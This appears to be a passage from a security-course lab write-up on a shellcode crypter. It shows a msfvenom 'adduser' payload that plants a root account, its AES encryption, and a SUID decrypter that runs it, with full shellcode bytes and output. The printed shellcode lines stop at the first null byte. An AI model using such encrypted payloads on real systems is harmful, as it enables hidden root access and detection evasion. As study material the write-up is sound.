7.C. Using other payload

So what’s the fun about starting shells, when you can do something else as well? Let’s try something else, using msfvenom to generate a raw payload as unencrypted payload for the encrypter. Afterwards, we’ll be using the encrypted payload for the decrypter and try to run it.

We’ll be using the linux/x86/adduser payload, which requires root or SUID privileges.

Create payload

$ msfvenom -p linux/x86/adduser user=hodorhodor pass=hodorhodor -f raw -o adduser_hodorhodor
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 97 bytes
Saved as: adduser_hodorhodor

$ xxd adduser_hodorhodor 
0000000: 31c9 89cb 6a46 58cd 806a 0558 31c9 5168  1...jFX..j.X1.Qh
0000010: 7373 7764 682f 2f70 6168 2f65 7463 89e3  sswdh//pah/etc..
0000020: 41b5 04cd 8093 e828 0000 0068 6f64 6f72  A......(...hodor
0000030: 686f 646f 723a 417a 6d75 5a72 6f73 426a  hodor:AzmuZrosBj
0000040: 5259 553a 303a 303a 3a2f 3a2f 6269 6e2f  RYU:0:0::/:/bin/
0000050: 7368 0a59 8b51 fc6a 0458 cd80 6a01 58cd  sh.Y.Q.j.X..j.X.
0000060: 80                                       .

Encrypt payload

I’ve encrypted the payload with the string “ISITMEYOURELOOKINGFOR”.

$ ./aes-128-cbc_enc adduser_hodorhodor 
Enter password to encrypt: 

ORIGINAL:
Oneliner:
"\x31\xC9\x89\xCB\x6A\x46\x58\xCD\x80\x6A\x05\x58\x31\xC9\x51\x68\x73\x73\x77\x64\x68\x2F\x2F\x70\x61\x68\x2F\x65\x74\x63\x89\xE3\x41\xB5\x04\xCD\x80\x93\xE8\x28";

16-byte newline delimiter:
"\x31\xC9\x89\xCB\x6A\x46\x58\xCD\x80\x6A\x05\x58\x31\xC9\x51\x68"\
"\x73\x73\x77\x64\x68\x2F\x2F\x70\x61\x68\x2F\x65\x74\x63\x89\xE3"\
"\x41\xB5\x04\xCD\x80\x93\xE8\x28";

ENCRYPTED:
Oneliner:
"\x58\x8C\xE6\xF3\x0D\x12\x5A\x42\xFD\x86\xA2\x9B\x81\xC6\x6F\xAD\xA1\x6A\xC5\xA1\xF9\xB8\xEE\xA1\xCD\xB4\xB2\x82\x72\x4C\x15\xC3\x91\x38\x99\x6A\x4F\xAA\x05\x1D\x29\x76\x63\x51\x64\xB3\x9B\xBD\xF9\x63\x6B\xA3\x5F\x7A\xF9\x64\x0E\xE0\x20\x92\xA0\xD5\x53\x4B\x45\x8A\x29\xF6\x5B\xBA\x1C\x24\x1D\xF2\x72\x06\x4A\x4F\x33\x85\x0D\xE1\x42\x16\x22\xE4\x4B\x25\x2F\x6F\x3A\x8A\x5D\x57\xD5\x35\xB3\x01\x21\x10\x15\xAB\x13\xC0\xB3\xFE\xC8\xB3\x55\x4C\xEF\x83";

16-byte newline delimiter:
"\x58\x8C\xE6\xF3\x0D\x12\x5A\x42\xFD\x86\xA2\x9B\x81\xC6\x6F\xAD"\
"\xA1\x6A\xC5\xA1\xF9\xB8\xEE\xA1\xCD\xB4\xB2\x82\x72\x4C\x15\xC3"\
"\x91\x38\x99\x6A\x4F\xAA\x05\x1D\x29\x76\x63\x51\x64\xB3\x9B\xBD"\
"\xF9\x63\x6B\xA3\x5F\x7A\xF9\x64\x0E\xE0\x20\x92\xA0\xD5\x53\x4B"\
"\x45\x8A\x29\xF6\x5B\xBA\x1C\x24\x1D\xF2\x72\x06\x4A\x4F\x33\x85"\
"\x0D\xE1\x42\x16\x22\xE4\x4B\x25\x2F\x6F\x3A\x8A\x5D\x57\xD5\x35"\
"\xB3\x01\x21\x10\x15\xAB\x13\xC0\xB3\xFE\xC8\xB3\x55\x4C\xEF\x83";

Compile and execute decrypter

$ vim hodor-decrypt-run_adduser.c

$ ../../compile_crypter.sh hodor-decrypt-run_adduser
[+] Compiling ... 
[+] Done!

$ sudo chown root hodor-decrypt-run_adduser
$ sudo chmod +s hodor-decrypt-run_adduser

$ ls -l hodor-decrypt-run_adduser
-rwsrwsr-x 1 root vbox 7672 Jan  3 23:12 hodor-decrypt-run_adduser


$ ./hodor-decrypt-run_adduser 
Enter password to decrypt: 

ENCRYPTED:
Oneliner:
"\x58\x8C\xE6\xF3\x0D\x12\x5A\x42\xFD\x86\xA2\x9B\x81\xC6\x6F\xAD\xA1\x6A\xC5\xA1\xF9\xB8\xEE\xA1\xCD\xB4\xB2\x82\x72\x4C\x15\xC3\x91\x38\x99\x6A\x4F\xAA\x05\x1D\x29\x76\x63\x51\x64\xB3\x9B\xBD\xF9\x63\x6B\xA3\x5F\x7A\xF9\x64\x0E\xE0\x20\x92\xA0\xD5\x53\x4B\x45\x8A\x29\xF6\x5B\xBA\x1C\x24\x1D\xF2\x72\x06\x4A\x4F\x33\x85\x0D\xE1\x42\x16\x22\xE4\x4B\x25\x2F\x6F\x3A\x8A\x5D\x57\xD5\x35\xB3\x01\x21\x10\x15\xAB\x13\xC0\xB3\xFE\xC8\xB3\x55\x4C\xEF\x83";

16-byte newline delimiter:
"\x58\x8C\xE6\xF3\x0D\x12\x5A\x42\xFD\x86\xA2\x9B\x81\xC6\x6F\xAD"\
"\xA1\x6A\xC5\xA1\xF9\xB8\xEE\xA1\xCD\xB4\xB2\x82\x72\x4C\x15\xC3"\
"\x91\x38\x99\x6A\x4F\xAA\x05\x1D\x29\x76\x63\x51\x64\xB3\x9B\xBD"\
"\xF9\x63\x6B\xA3\x5F\x7A\xF9\x64\x0E\xE0\x20\x92\xA0\xD5\x53\x4B"\
"\x45\x8A\x29\xF6\x5B\xBA\x1C\x24\x1D\xF2\x72\x06\x4A\x4F\x33\x85"\
"\x0D\xE1\x42\x16\x22\xE4\x4B\x25\x2F\x6F\x3A\x8A\x5D\x57\xD5\x35"\
"\xB3\x01\x21\x10\x15\xAB\x13\xC0\xB3\xFE\xC8\xB3\x55\x4C\xEF\x83";

DECRYPTED:
Oneliner:
"\x31\xC9\x89\xCB\x6A\x46\x58\xCD\x80\x6A\x05\x58\x31\xC9\x51\x68\x73\x73\x77\x64\x68\x2F\x2F\x70\x61\x68\x2F\x65\x74\x63\x89\xE3\x41\xB5\x04\xCD\x80\x93\xE8\x28";

16-byte newline delimiter:
"\x31\xC9\x89\xCB\x6A\x46\x58\xCD\x80\x6A\x05\x58\x31\xC9\x51\x68"\
"\x73\x73\x77\x64\x68\x2F\x2F\x70\x61\x68\x2F\x65\x74\x63\x89\xE3"\
"\x41\xB5\x04\xCD\x80\x93\xE8\x28";

Running shellcode...

$

Hmm, seems like nothing happened right? Let’s check /etc/password.

$ cat /etc/passwd

...<SNIP>...

postgres:x:116:125:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
guest-BoWy7X:x:117:126:Guest,,,:/tmp/guest-BoWy7X:/bin/bash
guest-KJihxL:x:118:127:Guest,,,:/tmp/guest-KJihxL:/bin/bash
vbox:x:1000:1000:,,,:/home/vbox:/bin/bash
guest-aKHocy:x:119:128:Guest,,,:/tmp/guest-aKHocy:/bin/bash
hodorhodor:AzmuZrosBjRYU:0:0::/:/bin/sh

It works!